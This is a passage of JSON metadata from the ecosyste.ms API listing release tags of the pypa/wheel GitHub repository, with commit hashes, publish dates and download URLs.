ypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.co